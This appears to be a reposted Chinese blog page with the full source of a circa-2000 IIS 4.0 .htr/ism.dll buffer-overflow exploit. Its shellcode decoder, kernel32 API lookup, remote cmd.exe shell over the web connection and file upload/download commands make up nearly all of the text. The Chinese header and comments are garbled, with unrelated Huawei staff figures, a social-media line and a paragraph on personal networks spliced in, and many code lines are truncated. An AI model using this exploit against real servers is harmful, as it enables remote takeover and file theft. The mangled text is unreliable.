IIS4.0的.htr映射ism.dll溢出攻击程序VC6源码
原创IIS4.0的.htr映射ism.dll溢出攻击程序
作者: 袁哥
/----------------------------------------------------------/
/ IIS4.0的.htr映射ism.dll溢出攻击程序 序 /
/ 该程序实现所有语言版本该程序实现所有语言版本该程序在所有语言中都可用WINDOWS在溢出攻击下。 /
/ SHELLCODE代码实现实现绑定代码实现绑定代码实现绑定cmd.exe启用上载的功能,启用上载的功能,用于上载的功能,启用上载的功能, /
/ 下载文件下载文档下载文件下载文件ftp无需打开即可实现加密传输功能的功能 /
/ 端口,没有服务,可以绕过防火墙等。原来的真实 /
/ 当前源代码编写当前源代码准备现在编写源代码shellcode可以促进准备的方法,可以促进准备的方法, /
/ 修改、调试修改、调试修改、调试shellcode2007年,华为有全球存在的一年,华为有全球存在的2007年,华为有全球的一年,华为有全球的 /
/ shellcode成为可能。它还解决了溢出攻击的几个根源 /
/ 本问题:1万人,占员工总数百万人,占员工总数百万人,占员工总数2、shellcode定位; /
/ 3、jmp esp功能代码地址确定。功能代码地址确定。功能代码地址标识。功能代码地址标识。4、WINDOWS的API /
/ 万名员工中的一万名员工 /
/ WWW函数,则可以在不修改WEB如果是页面文件,请替换如果是页面文件,请替换 /
/ 换所有WEB页面。 /
/ 一般的溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序溢出攻击程序也可以使用这个框架 /
/ /
/ 程序在vc6.0在编译下的编译下进行编译,使用 /
/----------------------------------------------------------/
/*
iis4.0 overflow program ver 1.0
copy by yuange < [yuange@163.net](mailto:yuange@163.net) > 2000。05。8
*/
#include
#include
#include
#include
#define FNENDLONG 0x08
#define NOPCODE B // INC EDX 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
// c:\inetpub\wwwroot 物理路径长度。物理路径长度。
// 因为WWW处理GET /华为全球员工保护投资到位ISM.DLL处理,因此溢出点和物理路径具有
// 脱下来。你可以从.IDC,.ida,.idq泄漏物理路径方法以获得物理路径长度
#define RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define ADD1 0xxxx-0xxxxx-PATHLONG+4
#define ADD2 0xxxxx-0xxxxx-PATHLONG+4
/* 在这些内部数据披露后,华为 2000.10.25 */
// 有关要处理的两个参数的地址,请参见后面的ISM.DLL这句话很快登上了微博热搜,引发了网民们的讨论。
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 12
#define DATAXORCODE 0xAA
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define WEBPORT 80
void shellcodefnlock();
void shellcodefn(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;
int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0"
"strend";
char buff1[]="GET /""\xff""default.htr/";
char buff2[]=".HTR HTTP/1.1 \nHOST:";
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx";
// ret
char eipexcept[]="\xxx\xxx\xxx\xxx";
char eipwinnt[] ="\xxx\xxx\xxx\xxx";
char eipwinnt2[]="\xxx\xxx\xxx\xxx";
char reteax[] ="\xxx\xxx\xxx\xxx";
/* 在这些内部数据披露后,华为 2000.10.25 */
char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct sockaddr\_in s\_in2,s\_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
int i,j,k;
unsigned char temp;
int fd;
u\_short port,port1,shellcodeport;
SOCKET d\_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange( [yuange@nsfocus.com](mailto:yuange@nsfocus.com) ) 2000.6.2.");
fprintf(stderr,"\n welcome to my homepage [http://yuange.yeah.net](http://yuange.yeah.net) .");
fprintf(stderr,"\n welcome to [http://www.nsfocus.com](http://www.nsfocus.com) .");
fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]);
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i2){
offset=atoi(argv[2]);
}
OVERADD+=offset;
/*
if(offset<0||offset>3){
fprintf(stderr,"\n offset error !offset 0 - 3 .");
gets(buff);
exit(1);
}
*/
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];
for(i=0;ih\_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF\_INET, SOCK\_STREAM,0);
i=8000;
setsockopt(fd,SOL\_SOCKET,SO\_RCVTIMEO,(const char *) &i,sizeof(i));
s\_in3.sin\_family = AF\_INET;
s\_in3.sin\_port = htons(port);
s\_in3.sin\_addr.s\_addr = d\_ip;
printf("\n nuke ip: %s port %d",inet\_ntoa(s\_in3.sin\_addr),htons(s\_in3.sin\_port));
if(connect(fd, (struct sockaddr *)&s\_in3, sizeof(struct sockaddr\_in))!=0) {
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
gets(buff);
exit(1);
}
\_asm{
mov ESI,ESP
cmp ESI,ESP
}
\_chkesp();
chkespadd=\_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else memcpy(buff,buff1,strlen(buff1));
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);
sendpacketlong=k+i;
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}
for(i=0;i2){
server=argv[2];
if(strcmp(server,"win9x")==0){
memcpy(buff+OVERADD,eipwin9x,4);
fprintf(stderr,"\n nuke win9x.");
}
if(strcmp(server,"winnt")==0){
memcpy(buff+OVERADD,eipwinnt,4);
fprintf(stderr,"\n nuke winnt.");
}
}
*/
sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
/*
#ifdef DEBUG
\_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
*/
if(argc>6){
if(strcmp(argv[6],"debug")==0){
\_asm{
lea esp,buff
add esp,OVERADD
ret
}
}
}
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send packet %d bytes.",j);
send(fd,buff,j,0);
k=newrecv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
xordatabegin=1;
k=-1;
fprintf(stderr,"\n ok!\n");
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
k=1;
while(k!=0){
if(k<0){
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
}
else{
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
}
else i=1;
}
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
newsend(fd,buff,k+2,0);
}
k=newrecv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
xordatabegin=1;
k=-1;
}
if(k>0){
buff[k]=0;
fprintf(stderr,"%s",buff);
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
/*
 * Decoder stub kept as MSVC inline assembly so its machine code can be lifted
 * out of the running image: main() takes this function's address, skips an
 * incremental-link 0xE9 thunk if present, scans for the 8-NOP terminator
 * (fnendstr / FNENDLONG) and memcpy()s the bytes into the request buffer.
 * No call to this function appears anywhere in the listing; it is never meant
 * to run in-process. The `_emit(?)` operand has been lost in this repost, so
 * the block does not assemble as shown. DATAXORCODE (0xAA, defined at the top
 * of the file) is the only file-level constant it references.
 */
void shellcodefnlock()
{
\_asm{
nop
nop
nop
nop
nop
nop
nop
nop
\_emit(?)
xor ecx,ecx
add si,474h
cmp dword ptr [esi],ecx
jnz getesi
add si,4
getesi: mov esi,[esi]
add si,8
xor ecx,ecx
mov byte ptr [esi],cl
jmp next
getediadd: pop EDI
push EDI
pop ESI
push ebx // ecb
push ebx // call shellcodefn ret address
xor ecx,ecx
looplock: lodsb
cmp al,cl
jz shell
cmp al,0x30
jz clean0
sto: xor al,DATAXORCODE
stosb
jmp looplock
clean0: lodsb
sub al,0x40
jmp sto
next: call getediadd
shell: NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void shellcodefn(char *ecb)
{
char Buff[SHELLBUFFSIZE+2];
int *except[3];
FARPROC Sleepadd;
FARPROC GetLastErroradd;
FARPROC GetFileSizeadd;
FARPROC CreateFileAadd;
FARPROC WriteFileadd;
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC procloadlib;
FARPROC apifnadd[1];
FARPROC procgetadd=0;
FARPROC writeclient= *(int *)(ecb+0x84);
FARPROC readclient = *(int *)(ecb+0x88);
HCONN ConnID = *(int *)(ecb+8) ;
char *stradd;
int imgbase,fnbase,i,k,l;
HANDLE libhandle,fpt; //libwsock32;
STARTUPINFO siinfo;
PROCESS\_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int lBytesRead;
int lockintvar1,lockintvar2;
char lockcharvar;
SECURITY\_ATTRIBUTES sa;
\_asm {
jmp nextcall
getstradd: pop stradd
lea EDI,except
mov eax,dword ptr FS:[0]
mov dword ptr [edi+0x08],eax
mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;
imgbase=0x77e00000;
\_asm{
call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;
if(*( WORD *)imgbase==ZM&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))==EP){
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;
if(*(int *)k ==NREK&&*(int *)(k+4)==23LE){
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
if(*(int *)(imgbase+*(int *)k)==PteG&&*(int *)(4+imgbase+*(int *)k)==Acor){
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
k+=*(int *)(fnbase+0x10)-1;
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
procgetadd=k+imgbase;
break;
}
}
}
}
}
// 搜索KERNEL32。DLL模块地址和模块地址以及API函数 GetProcAddress地址
// 为了进一步了解什么是有效的网络,让我们再看看Deb.她有一小群核心联系人--14个她真正依赖的人。有效的核心网络的规模通常在12至18人之间.但真正重要的是结构.核心联系必须连接更小、更多样化的群体,并跨越等级、组织、职能和地理界限.核心关系应该导致更多的学习,减少决策中的偏见,以及更大的个人成长和平衡.你的核心圈子里的人也应该是积极行为的典范,因为如果你周围的人是热情的、真实的和慷慨的,你也会这样.
\_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}
if(procgetadd==0) goto die ;
for(k=1;k0){
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0){
for(k=0;k4&&Buff[0]==p&&Buff[1]==u&&Buff[2]==t&&Buff[3]== ){
l=*(int *)(Buff+4);
// WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
fpt=CreateFileAadd(Buff+0x8,FILE\_FLAG\_WRITE\_THROUGH+GENERIC\_WRITE,FILE\_SHARE\_READ,NULL,CREATE\_ALWAYS,FILE\_ATTRIBUTE\_NORMAL,0)
;
k=GetLastErroradd();
i=0;
while(l>0){
k=readclient(ConnID,Buff,&lBytesRead);
if(k==1){
if(lBytesRead>0){
for(k=0;k10000) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else{
if(k==1&&lBytesRead>4&&Buff[0]==g&&Buff[1]==e&&Buff[2]==t&&Buff[3]== ){
fpt=CreateFileAadd(Buff+4,GENERIC\_READ,FILE\_SHARE\_READ+FILE\_SHARE\_WRITE,NULL,OPEN\_EXISTING,FILE\_ATTRIBUTE\_NORMAL,0);
Sleepadd(100);
l=GetFileSizeadd(fpt,&k);
*(int *)Buff=ezis; //size
*(int *)(Buff+4)=l;
lBytesRead=8;
for(i=0;i0){
k=SHELLBUFFSIZE;
ReadFileadd(fpt,Buff,k,&k,0);
if(k>0){
for(i=0;i100) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else l=1;
}
}
if(k!=1){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
while(1){
Sleepadd(0x7fffffff); //僵死
}
}
else{
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
// Sleepadd(1000);
}
}
}
die: goto die ;
\_asm{
getexceptretadd: pop eax
push eax
mov edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
errprogram: mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344 //stradd-0xe
xor eax,eax //2
ret //1
execptprogram: jmp errprogram //2 bytes stradd-7
nextcall: call getstradd //5 bytes
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;
for(i=0;i0){
size=0x800;
ReadFile(fpt,buff,size,&size,NULL);
if(size>0){
newsend(fd,buff,size,0);
// Sleep(0100);
filesize-=size;
}
}
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("\n put file ok!\n");
Sleep(1000);
}
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i0){
buff[i]=0;
if(memcmp(buff,"size",4)==0){
filesize=*(int *)(buff+4);
j=100;
}
else {
j=0;
printf("\n recv %s",buff);
}
}
else ++j;
// if(j>1000) i=0;
}
printf("\n file %d bytes %d\n",filesize,i);
if(i>8){
i-=8;
WriteFile(fpt,buff+8,i,&i,NULL);
filesize-=i;
}
while(filesize>0){
size=newrecv(fd,buff,0x800,0);
if(size>0){
WriteFile(fpt,buff,size,&size,NULL);
filesize-=size;
}
else {
if(size==0) {
printf("\n ftp close \n ");
}
else {
printf("\n Sleep(100)");
Sleep(100);
}
}
}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
int newrecv(int fd,char *buff,int size,int flag)
{
int i,k;
k=recv(fd,buff,size,flag);
if(xordatabegin==1){
for(i=0;i
转载于:https://www.cnblogs.com/F4ncy/archive/2005/04/20/142212.html